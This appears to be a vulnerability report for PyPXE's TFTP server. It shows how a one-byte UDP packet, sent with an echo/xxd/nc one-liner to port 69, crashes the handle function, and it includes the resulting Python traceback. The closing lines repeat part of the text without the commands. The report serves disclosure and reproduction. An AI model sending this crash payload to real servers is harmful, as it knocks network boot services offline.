A denied service bug exists in the handle function in the tftp module when parsing a packet of insufficient length.
Reproduce
1. Start the Server
python -m pypxe.server --tftp
2. Attack
Send a UDP packet with the following payload:
echo -n "00" | xxd -r -p | nc -u 127.0.0.1 69
Then, the server will crash and the logs are as follows:
2023-10-26 14:56:25,545 [INFO] PyPXE Starting TFTP server...
2023-10-26 14:56:25,545 [INFO] PyPXE PyPXE successfully initialized and running!
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
self.run()
File "/usr/lib/python2.7/threading.py", line 754, in run
self.__target(*self.__args, **self.__kwargs)
File "pypxe/tftp.py", line 289, in listen
self.ongoing.append(Client(sock, self))
File "pypxe/tftp.py", line 39, in __init__
self.handle() # message from the main socket
File "pypxe/tftp.py", line 201, in handle
[opcode] = struct.unpack('!H', self.message[:2])
error: unpack requires a string argument of length 2
A denied service bug exists in the
handlefunction in thetftpmodule when parsing a packet of insufficient length.Reproduce
1. Start the Server
2. Attack
Send a UDP packet with the following payload:
Then, the server will crash and the logs are as follows: